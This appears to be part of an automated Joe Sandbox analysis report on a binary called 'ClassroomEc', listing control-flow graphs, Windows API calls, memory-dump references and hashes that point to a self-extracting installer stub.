                                                                                                                                                              control_flow_graph 978 d6b950-d6b9ae call d612d0 * 2 call d6d260 call d6cc80 call d6cba0 989 d6b9b0-d6b9c8 call d6d2b0 978->989 990 d6b9cd-d6b9f2 call d6b6f0 call d6cdf0 call d74ba0 978->990 995 d6c78e-d6c794 989->995 1000 d6b9f4-d6ba14 call d6d200 call d6d2b0 990->1000 1001 d6ba19-d6ba3c call d6ccc0 990->1001 1000->995 1007 d6ba42-d6ba5a 1001->1007 1008 d6badf-d6baea 1001->1008 1012 d6ba93-d6baaa 1007->1012 1013 d6ba5c 1007->1013 1010 d6baec-d6bb07 call d6cfd0 1008->1010 1011 d6bb0d-d6bb35 call d79ef0 ??2@YAPAXI@Z 1008->1011 1010->1011 1025 d6bdb7-d6be0d call d612d0 call d6d910 1010->1025 1026 d6bb37-d6bb4a call d6c840 1011->1026 1027 d6bb4c 1011->1027 1018 d6baac-d6babb 1012->1018 1019 d6bac9 1012->1019 1016 d6ba6e-d6ba8e call d6d200 call d6d2b0 1013->1016 1017 d6ba5e-d6ba6c 1013->1017 1016->995 1017->1012 1017->1016 1018->1019 1024 d6babd-d6bac7 1018->1024 1020 d6bad3-d6bad9 1019->1020 1020->1008 1024->1020 1048 d6be13-d6be91 call d612d0 call d6c800 call d612b0 call d760b0 call d612d0 1025->1048 1049 d6c26c-d6c270 1025->1049 1031 d6bb56-d6bb93 call d76110 1026->1031 1027->1031 1038 d6bba6 1031->1038 1039 d6bb95-d6bba4 1031->1039 1041 d6bbb0-d6bbe8 1038->1041 1039->1041 1046 d6bc11-d6bc3a call d6d910 1041->1046 1047 d6bbea-d6bc0c call d6d200 call d6d2b0 1041->1047 1066 d6bc40-d6bc8f call d612d0 call d6d2d0 call d76610 1046->1066 1067 d6bd9c-d6bdb4 call d6d320 1046->1067 1047->995 1117 d6be97-d6bebe call d6d910 1048->1117 1118 d6bf8b-d6bfd2 call d634f0 call d612b0 call d760b0 call d612d0 1048->1118 1053 d6c272-d6c296 1049->1053 1054 d6c29b-d6c2bd call d6daa0 ??2@YAPAXI@Z 1049->1054 1053->1054 1062 d6c2d2 1054->1062 1063 d6c2bf-d6c2d0 call d6d350 1054->1063 1069 d6c2dc-d6c303 call d6d770 call d6d910 1062->1069 1063->1069 1091 d6bcc3-d6bcd3 call d6cb80 1066->1091 1092 d6bc91-d6bcbe call d6d300 call d6d200 call d6d2b0 1066->1092 1067->1025 1089 d6c392-d6c3bb call d6d910 1069->1089 1090 d6c309-d6c340 1069->1090 1111 d6c5b1-d6c5d5 call d75e80 call d6dc60 1089->1111 1112 d6c3c1-d6c3fc call d612b0 call d6d910 1089->1112 1103 d6c342-d6c37a call d634f0 call d6da30 call d6d200 call d6d2b0 1090->1103 1104 d6c37f-d6c38e call d76110 1090->1104 1109 d6bcd5-d6bce5 call d6d7a0 1091->1109 1110 d6bd19-d6bd29 call d6d7a0 1091->1110 1092->995 1103->995 1104->1089 1131 d6bd17 1109->1131 1132 d6bce7-d6bd12 call d6d300 call d6d200 call d6d2b0 1109->1132 1138 d6bd3c-d6bd67 call d6d300 call d6d200 call d6d2b0 1110->1138 1139 d6bd2b-d6bd3a 1110->1139 1156 d6c5e0-d6c5e6 1111->1156 1153 d6c402-d6c420 call d76de0 1112->1153 1154 d6c48a-d6c4a1 ??2@YAPAXI@Z 1112->1154 1145 d6bef0-d6bf26 call d612d0 * 2 call d84af0 1117->1145 1146 d6bec0-d6beeb call d634f0 call d6d200 call d6d2b0 1117->1146 1223 d6bfd4-d6c017 call d612d0 call d6cd10 1118->1223 1224 d6c04b-d6c0b9 call d634f0 call d6dc10 call d6dc60 1118->1224 1147 d6bd6c-d6bd97 call d6d300 1131->1147 1132->995 1138->995 1139->1138 1139->1147 1211 d6bf28-d6bf38 1145->1211 1146->995 1147->1067 1175 d6c422-d6c42f 1153->1175 1162 d6c4b6 1154->1162 1163 d6c4a3-d6c4b4 call d6d4e0 1154->1163 1166 d6c613-d6c617 1156->1166 1167 d6c5e8-d6c611 call d75ea0 call d612d0 * 2 1156->1167 1180 d6c4c0-d6c4f6 call d76110 call d6d220 1162->1180 1163->1180 1169 d6c74d-d6c788 call d704f0 call d634f0 call d6da30 call d6d200 call d6d2b0 1166->1169 1170 d6c61d-d6c62c call d612b0 1166->1170 1167->1156 1169->995 1209 d6c62e-d6c64e call d74ec0 1170->1209 1210 d6c69c-d6c6b2 call d612d0 1170->1210 1192 d6c431-d6c474 call d634f0 * 2 call d6da30 call d6d200 call d6d2b0 1175->1192 1193 d6c479-d6c488 call d76110 1175->1193 1214 d6c4fb-d6c512 ??2@YAPAXI@Z 1180->1214 1192->995 1193->1214 1209->1210 1239 d6c650-d6c667 ??2@YAPAXI@Z 1209->1239 1233 d6c6c7-d6c6ca 1210->1233 1234 d6c6b4-d6c6c5 call d612d0 1210->1234 1218 d6bf44-d6bf57 1211->1218 1219 d6bf3a 1211->1219 1226 d6c527 1214->1226 1227 d6c514-d6c525 call d6d5d0 1214->1227 1218->1118 1229 d6bf59-d6bf86 call d634f0 call d6d200 call d6d2b0 1218->1229 1219->1218 1223->1224 1286 d6c019-d6c046 call d634f0 call d6d200 call d6d2b0 1223->1286 1292 d6c0bf-d6c0d8 call d6cc20 1224->1292 1293 d6c1dd-d6c1e1 1224->1293 1238 d6c531-d6c5ac call d75e30 call d76110 call d612d0 call d6c7a0 call d6c7c0 call d634f0 1226->1238 1227->1238 1229->995 1245 d6c6d0-d6c701 call d612d0 call d75a00 1233->1245 1234->1245 1238->1111 1249 d6c680 1239->1249 1250 d6c669-d6c67e call d6cd20 1239->1250 1280 d6c703-d6c74b call d634f0 call d704f0 call d634f0 call d6da30 call d6d200 call d6d2b0 1245->1280 1260 d6c68a-d6c697 call d76110 1249->1260 1250->1260 1260->1210 1280->995 1286->995 1307 d6c0da-d6c116 call d612d0 * 3 1292->1307 1308 d6c11b-d6c134 call d6cbc0 1292->1308 1298 d6c1f6-d6c20d call d612d0 1293->1298 1299 d6c1e3-d6c1e9 1293->1299 1306 d6c213-d6c267 call d612d0 call d704f0 * 2 1298->1306 1299->1298 1305 d6c1eb-d6c1f4 1299->1305 1305->1306 1306->1049 1344 d6c1d8 1307->1344 1326 d6c136-d6c16c call d704f0 * 2 call d6d200 call d6d2b0 1308->1326 1327 d6c171-d6c1d5 call d612d0 * 3 1308->1327 1326->995 1327->1344
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: W
                                                                                                                                                              • API String ID: 0-655174618
                                                                                                                                                              • Opcode ID: 3c200096b9ea7b1d6e0a33d2adc1815e14765070e324f781388554422e8f18d5
                                                                                                                                                              • Instruction ID: af8c8cc0f5daf541c09fe79afc083af3e28b8aaecd570a0e4f25099ea4443eae
                                                                                                                                                              • Opcode Fuzzy Hash: 3c200096b9ea7b1d6e0a33d2adc1815e14765070e324f781388554422e8f18d5
                                                                                                                                                              • Instruction Fuzzy Hash: 8792C374A101288BDB28EF64DCA1BEDB771EF58304F1481D9E54AA7251DB30AE85CFB4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1399 d66680-d6671c LoadLibraryA #17 call d6b590 call d65e70 * 6 1414 d6672d-d66734 1399->1414 1415 d667ed-d667f0 1414->1415 1416 d6673a-d66754 SHGetSpecialFolderPathW 1414->1416 1417 d6675a-d66786 wsprintfW call d636c0 1416->1417 1418 d667e8 1416->1418 1421 d6678b-d66798 1417->1421 1418->1414 1422 d667a9-d667b0 1421->1422 1422->1418 1423 d667b2-d667c5 1422->1423 1424 d667e6 1423->1424 1425 d667c7-d667e3 call d636c0 1423->1425 1424->1422 1425->1424
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32), ref: 00D6668E
                                                                                                                                                              • #17.COMCTL32 ref: 00D66699
                                                                                                                                                                • Part of subcall function 00D65E70: GetLastError.KERNEL32 ref: 00D65EC8
                                                                                                                                                                • Part of subcall function 00D65E70: wsprintfW.USER32 ref: 00D65EDE
                                                                                                                                                                • Part of subcall function 00D65E70: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00D65EEF
                                                                                                                                                                • Part of subcall function 00D65E70: GetLastError.KERNEL32 ref: 00D65EF8
                                                                                                                                                                • Part of subcall function 00D65E70: ??2@YAPAXI@Z.MSVCRT ref: 00D65F1D
                                                                                                                                                                • Part of subcall function 00D65E70: GetEnvironmentVariableW.KERNEL32(?,?,00D6B311), ref: 00D65F43
                                                                                                                                                                • Part of subcall function 00D65E70: GetLastError.KERNEL32 ref: 00D65F52
                                                                                                                                                                • Part of subcall function 00D65E70: lstrcmpiW.KERNEL32(00000000,?), ref: 00D65F80
                                                                                                                                                                • Part of subcall function 00D65E70: ??3@YAXPAX@Z.MSVCRT ref: 00D65FA3
                                                                                                                                                                • Part of subcall function 00D65E70: SetLastError.KERNEL32(?), ref: 00D66003
                                                                                                                                                                • Part of subcall function 00D65E70: ??3@YAXPAX@Z.MSVCRT ref: 00D65FCC
                                                                                                                                                                • Part of subcall function 00D65E70: ??3@YAXPAX@Z.MSVCRT ref: 00D65FF7
                                                                                                                                                                • Part of subcall function 00D65E70: lstrlenA.KERNEL32(?), ref: 00D66067
                                                                                                                                                                • Part of subcall function 00D65E70: ??2@YAPAXI@Z.MSVCRT ref: 00D6608A
                                                                                                                                                                • Part of subcall function 00D65E70: GetLocaleInfoW.KERNELBASE(00000000,00001004,?,0000001F), ref: 00D660D3
                                                                                                                                                                • Part of subcall function 00D65E70: _wtol.MSVCRT(?), ref: 00D660E4
                                                                                                                                                                • Part of subcall function 00D65E70: MultiByteToWideChar.KERNEL32(000004E4,00000000,?,?,00000000,?), ref: 00D66117
                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000040,00000000), ref: 00D6674C
                                                                                                                                                              • wsprintfW.USER32 ref: 00D6676D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$??3@$??2@EnvironmentVariablewsprintf$ByteCharFolderInfoLibraryLoadLocaleMultiPathSpecialWide_wtollstrcmpilstrlen
                                                                                                                                                              • String ID: @$SfxFolder%02d$kernel32
                                                                                                                                                              • API String ID: 2629262089-574402807
                                                                                                                                                              • Opcode ID: bedcc378f29de45e56d7c62de104851c77e148e1c7b6a9671c0f8d425ac5934f
                                                                                                                                                              • Instruction ID: 5118767235d1107d131a5500426567a30a872411765849daa2f2f5e7228205ea
                                                                                                                                                              • Opcode Fuzzy Hash: bedcc378f29de45e56d7c62de104851c77e148e1c7b6a9671c0f8d425ac5934f
                                                                                                                                                              • Instruction Fuzzy Hash: 053170F09543189BEF10EF64EC4ABA97375EB10708F0401A9E50D963D1E772AA94CF72
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1429 d62d40-d62d8d call d62f60 CreateThread 1432 d62d8f-d62d96 1429->1432 1433 d62dac-d62dbd 1429->1433 1434 d62d9d-d62da6 WaitForSingleObject 1432->1434 1435 d62d98 call d6b490 1432->1435 1436 d62e30-d62e3e 1433->1436 1437 d62dbf-d62dd5 1433->1437 1434->1433 1435->1434 1439 d62e44-d62e4b 1436->1439 1440 d62ec8-d62ecd 1436->1440 1441 d62dd7-d62de1 1437->1441 1442 d62e14-d62e23 call d6b300 1437->1442 1445 d62e4d-d62e60 GetExitCodeThread 1439->1445 1446 d62e68-d62e75 1439->1446 1444 d62ed1-d62ed4 1440->1444 1441->1442 1447 d62df6-d62e02 call d6b300 1441->1447 1448 d62e04-d62e10 call d6b300 1441->1448 1449 d62e12 1441->1449 1450 d62de8-d62df4 call d6b300 1441->1450 1452 d62e26-d62e2b 1442->1452 1445->1446 1454 d62e62-d62e66 1445->1454 1456 d62e77-d62e87 call d6b300 1446->1456 1457 d62e89-d62e95 1446->1457 1447->1452 1448->1452 1449->1452 1450->1452 1452->1444 1454->1446 1463 d62ec6-d62ecf 1454->1463 1467 d62ebf-d62ec4 1456->1467 1460 d62e97-d62e9e 1457->1460 1461 d62ea0-d62ebc SetLastError call d6b300 1457->1461 1460->1461 1460->1467 1461->1467 1463->1444 1467->1444
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D62F60: _DebugHeapAllocator.LIBCPMTD ref: 00D62F71
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00002FA0,?,00000000,?), ref: 00D62D7B
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000284,000000FF), ref: 00D62DA6
                                                                                                                                                                • Part of subcall function 00D6B300: wvsprintfW.USER32(?,?,?), ref: 00D6B32D
                                                                                                                                                                • Part of subcall function 00D6B300: GetLastError.KERNEL32 ref: 00D6B33D
                                                                                                                                                                • Part of subcall function 00D6B300: FormatMessageW.KERNEL32(00001100,00000000,?,?,?,00000000,00000000), ref: 00D6B36C
                                                                                                                                                                • Part of subcall function 00D6B300: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00D6B393
                                                                                                                                                                • Part of subcall function 00D6B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00D6B3A8
                                                                                                                                                                • Part of subcall function 00D6B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00D6B3BB
                                                                                                                                                                • Part of subcall function 00D6B300: ??2@YAPAXI@Z.MSVCRT ref: 00D6B3DC
                                                                                                                                                                • Part of subcall function 00D6B300: lstrcpyW.KERNEL32(?,?), ref: 00D6B404
                                                                                                                                                                • Part of subcall function 00D6B300: lstrcpyW.KERNEL32(?,?), ref: 00D6B437
                                                                                                                                                                • Part of subcall function 00D6B300: ??3@YAXPAX@Z.MSVCRT ref: 00D6B45F
                                                                                                                                                                • Part of subcall function 00D6B300: LocalFree.KERNEL32(?), ref: 00D6B46E
                                                                                                                                                              • GetExitCodeThread.KERNELBASE(00000284,00000000), ref: 00D62E58
                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00D62EA9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFormatLastMessageThreadlstrcpylstrlen$??2@??3@AllocatorCodeCreateDebugExitFreeHeapLocalObjectSingleWaitwvsprintf
                                                                                                                                                              • String ID: i
                                                                                                                                                              • API String ID: 974866615-3865851505
                                                                                                                                                              • Opcode ID: d64021a04763b26e33a48a2be7f095923f3d0dcea95f8359faf7eb4261201552
                                                                                                                                                              • Instruction ID: 455323c6e4770d696ca8e49ee837da3cf3430c75ff535f56174bf267796a800e
                                                                                                                                                              • Opcode Fuzzy Hash: d64021a04763b26e33a48a2be7f095923f3d0dcea95f8359faf7eb4261201552
                                                                                                                                                              • Instruction Fuzzy Hash: B941DD71A14708EBD720DB98EC06F797372EB44305F28422AF545DA3D2C371AA84DB72
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D635B0: _DebugHeapAllocator.LIBCPMTD ref: 00D635C0
                                                                                                                                                                • Part of subcall function 00D635B0: wcsncpy.MSVCRT ref: 00D635E4
                                                                                                                                                              • GetTempPathW.KERNEL32(00000001,00000000,00000002), ref: 00D637AB
                                                                                                                                                              • GetTempPathW.KERNEL32(-00000001,00000000,-00000001,00000000), ref: 00D637DB
                                                                                                                                                              • wsprintfW.USER32 ref: 00D63833
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 00D6384D
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D63863
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeapPathTemp$AttributesFilewcsncpywsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3320338524-0
                                                                                                                                                              • Opcode ID: c7c2546f5610eecd0a55537054ac53813692313d3df5687acd5c5c9fa1f1260c
                                                                                                                                                              • Instruction ID: 5f80f2beadb730e6d9c09d1c3d89479f3754a73816f341e5d1ffba9abbd2c19c
                                                                                                                                                              • Opcode Fuzzy Hash: c7c2546f5610eecd0a55537054ac53813692313d3df5687acd5c5c9fa1f1260c
                                                                                                                                                              • Instruction Fuzzy Hash: 0921F670D0010AEBCB04EBA4C992AFEB7B8EF44305F644119F506B7291EB306B48CBB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1569 d63d20-d63d34 CreateDirectoryW 1570 d63d36-d63d46 GetLastError 1569->1570 1571 d63d7f 1569->1571 1573 d63d56-d63d67 GetFileAttributesW 1570->1573 1574 d63d48-d63d54 SetLastError 1570->1574 1572 d63d84-d63d87 1571->1572 1573->1571 1575 d63d69-d63d6f 1573->1575 1574->1572 1575->1571 1576 d63d71-d63d7d SetLastError 1575->1576 1576->1572
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(00D64DBB,00000000,00D64DBB,00000000,?,?,?,?,?,?,?,?,?,?,?,00D62B43), ref: 00D63D2C
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00D62B43,00000000,00000000,?), ref: 00D63D36
                                                                                                                                                              • SetLastError.KERNEL32(000000B7), ref: 00D63D4C
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(000000B7), ref: 00D63D5A
                                                                                                                                                              • SetLastError.KERNEL32(000000B7), ref: 00D63D75
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 635176117-0
                                                                                                                                                              • Opcode ID: 13d94d340e34fd04b414d3e0f004b137b267813c39e69b330d8757757326192e
                                                                                                                                                              • Instruction ID: 6bfea263b0769ff82d7cb9d201701fc39ec0e9a89be28ccae1b7c1b72265b9d7
                                                                                                                                                              • Opcode Fuzzy Hash: 13d94d340e34fd04b414d3e0f004b137b267813c39e69b330d8757757326192e
                                                                                                                                                              • Instruction Fuzzy Hash: B2F0FF35914308EBCB10EFB4D85CAADBBB8AB18355F184558E856DB290D735DA41CF70
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1577 d63e20-d63e7e call d87720 call d76de0 call d64080 lstrlenA * 2 1583 d63e85-d63e8c 1577->1583 1584 d64072-d64075 1583->1584 1585 d63e92-d63e96 1583->1585 1586 d63ea1-d63eb3 call d638d0 1585->1586 1587 d63e98-d63e9f 1585->1587 1586->1584 1587->1586 1588 d63eb8-d63eeb call d76d10 1587->1588 1591 d63eed-d63eef 1588->1591 1592 d63ef1-d63ef8 1591->1592 1593 d63efa-d63efc 1591->1593 1592->1593 1594 d63f01-d63f10 1592->1594 1593->1584 1595 d63f1a-d63f21 1594->1595 1596 d63f27-d63f2d 1595->1596 1597 d64028-d6406d memmove 1595->1597 1598 d63f33-d63f42 1596->1598 1599 d63fb8-d63fc7 1596->1599 1597->1583 1602 d63f44 1598->1602 1603 d63f49-d63f69 memcmp 1598->1603 1600 d63fcb-d63feb memcmp 1599->1600 1601 d63fc9 1599->1601 1604 d64014-d6401d 1600->1604 1605 d63fed-d6400c 1600->1605 1601->1597 1602->1597 1606 d63f72-d63f8e 1603->1606 1607 d63f6b-d63f6d 1603->1607 1612 d64023 1604->1612 1610 d64012 1605->1610 1611 d6400e 1605->1611 1608 d63f97-d63fb6 call d640a0 1606->1608 1609 d63f90-d63f92 1606->1609 1607->1584 1608->1612 1609->1584 1610->1612 1611->1610 1612->1595
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$memcmpmemmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994076250-0
                                                                                                                                                              • Opcode ID: 6bee9592442c6d4fc9015f5a7be92900c0a279471a87e7471717eea1c1bec67a
                                                                                                                                                              • Instruction ID: 69806ba1333801b3a5ecda00a2abfc72bf47f071f4179b39c4a3d54fba1f888e
                                                                                                                                                              • Opcode Fuzzy Hash: 6bee9592442c6d4fc9015f5a7be92900c0a279471a87e7471717eea1c1bec67a
                                                                                                                                                              • Instruction Fuzzy Hash: B3613B70E042999BCB14CF58C894BEEB7B5BF48384F148199E999A7284D7B19F84CF60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$FormatMessagelstrcpy$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                              • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                              • API String ID: 617470318-372238525
                                                                                                                                                              • Opcode ID: 78b3743f6c0602b3c42f181f7a68ac6d70067fa44eeb24d2cdf3d5cf50f71497
                                                                                                                                                              • Instruction ID: b887ad7052a1e10721a19743333d28b1f07d0fee6d0544ee7103cd3d12516514
                                                                                                                                                              • Opcode Fuzzy Hash: 78b3743f6c0602b3c42f181f7a68ac6d70067fa44eeb24d2cdf3d5cf50f71497
                                                                                                                                                              • Instruction Fuzzy Hash: 3F215C74A00209ABDB04EF95DC62BAE7374EF14704F504558F5156B1C2EBB0EA18CBF5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,GetNativeSystemInfo), ref: 00D66191
                                                                                                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 00D661A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressInfoNativeProcSystem
                                                                                                                                                              • String ID: GetNativeSystemInfo
                                                                                                                                                              • API String ID: 2220751540-3949249589
                                                                                                                                                              • Opcode ID: 68ded44e6ba96334a3c30e3ad6dce01c8ccea693aa9b7050f2d1a23960123384
                                                                                                                                                              • Instruction ID: d86cf2bd87f03c55d3c2f6a78ad5ce23d6ca98c7492ab744c09442e05502bb7b
                                                                                                                                                              • Opcode Fuzzy Hash: 68ded44e6ba96334a3c30e3ad6dce01c8ccea693aa9b7050f2d1a23960123384
                                                                                                                                                              • Instruction Fuzzy Hash: 88E0B630915308EBCB04EBA8995D5EDB7B8AB09311F140555F845A2290E6389A94D770
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D623A4
